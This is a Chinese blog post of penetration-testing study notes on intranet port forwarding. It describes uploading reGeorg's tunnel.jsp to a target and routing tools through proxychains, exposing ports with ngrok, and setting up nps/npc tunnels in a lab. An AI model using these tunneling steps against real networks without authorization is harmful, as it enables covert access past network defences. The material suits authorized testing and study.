内网端口转发(二)
本文属于学习笔记,内容来源于
https://mp.weixin.qq.com/s/zwaeUD7-QMTYgvymgw2EVQ
reGeorg
Github参考:https://github.com/sensepost/reGeorg
php不可用,有大佬自改过后可以用。但是下载地址没了
Linux下的用法
根据目标对应的脚本,将对应的脚本上传到目标,jsp就是tunnel.jsp
reGeorg -u [url] -p [转发到本地的端口]
配置proxychains,添加本机IP和转发的端口
vim /etc/proxychains.conf
然后使用工具的时候如下方式执行:
proxychains [工具名]
例如:proxychains curl http://192.168.1.1
可以看到转发的流量
Windows的用法
链接:https://bbs.ichunqiu.com/thread-12514-1-1.html
ngrok
虽然内网穿透工具众多,但我还是爱好国外免费的ngrok
根据对应的系统下载对应的ngrok,然后登录获取key,将ngrok进行注册
将本地的4444端口映射到外网
这里有个不好的消息:国外的ngrok貌似被墙了
当然这里也可以用国内的ngrok就是有点繁琐
缺点:
- 需要fq
- 填写IP会变动,所以得填写域名
- 穿透RDP会卡
nps
仓库地址:https://github.com/cnlh/nps/releases
启动nps,执行./nps
,注意不要和系统服务冲突
访问http://IP:8080可看到管理界面
,默认账户是admin/123
登录进去后如下:
新增一个客户端
可以看到客户端多了一个
查看客户端连接命令
根据目标系统下载对应的client,填写basic账号密码:
然后执行
./npc -server=192.168.241.152:8024 -vkey=test -type=tcp
新建TCP隧道
netstat -ant | grep 4444
mstsc连接
在仪表盘可以看到流量的产生
网络图是这样
A attack 192.168.241.152
B windows 7 192.168.1.104
C widnows server 2008 192.168.241.155
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:内网端口转发(二)
本文作者:九世
发布时间:2019-09-22, 22:29:35
最后更新:2019-09-22, 22:37:34
原始链接:http://jiushill.github.io/posts/6ee35fc8.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。